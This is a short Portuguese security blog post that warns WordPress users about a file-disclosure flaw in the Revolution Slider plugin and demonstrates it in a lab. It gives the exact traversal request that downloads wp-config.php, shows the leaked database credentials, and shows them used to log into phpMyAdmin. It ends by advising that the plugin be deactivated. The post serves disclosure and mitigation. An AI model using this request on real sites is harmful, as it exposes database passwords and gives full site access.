Para aqueles que utilizam o WordPress desativem o plugin Revolution Slide, pois foi divulgado uma vulnerabilidade que permite que a senha do banco de dados seja capturada com muita facilidade permitindo assim quem um cracker possa obter acesso a todo o site e capturar as informações.

Site : themepunch.com/revolution

01 - Passo

Preparei o servidor 10.10.10.131 e com a versão mais atual do WordPress 3.9.2 e instalei o plugin Revolution Slider.

02 - Passo

Após adicionar o caminho abaixo na URL do WordPress automaticamente inicia-se o download do arquivo admin-ajax.php contendo as informações do banco de dados.

http://10.10.10.131/wordpress/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

03 - Passo

Como pode visualizar o arquivo exibe:

DB_NAME : wordpress ( Nome do Banco de Dados ).
DB_USER : 100security ( Nome do Usuário utilizado na conexão com o Banco de Dados ).
DB_PASSWORD : [email protected]@@123456 ( Senha do Usuário 100security utilizado na conexão com o Banco de Dados ).

04 - Passo

Com estas informações agora é possível realizar o acesso ao Banco de Dados do WordPress através do PHPMyAdmin.

http://10.10.10.131/phpmyadmin

Usuário : 100security
Senha : [email protected]@@123456

05 - Passo

Acesso Completo ao Banco de Dados do WordPress

06 - Passo

Desative o plugin Revolution Slider.

07 - Passo

Após desativar o plugin verifique que ao tentar realizar um novo ataque o download não é realizado.

http://10.10.10.131/wordpress/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php



  Autor

Marcos Henrique

 São Paulo/SP



  Aplicações Web

© 2020 - 100SECURITY

Contato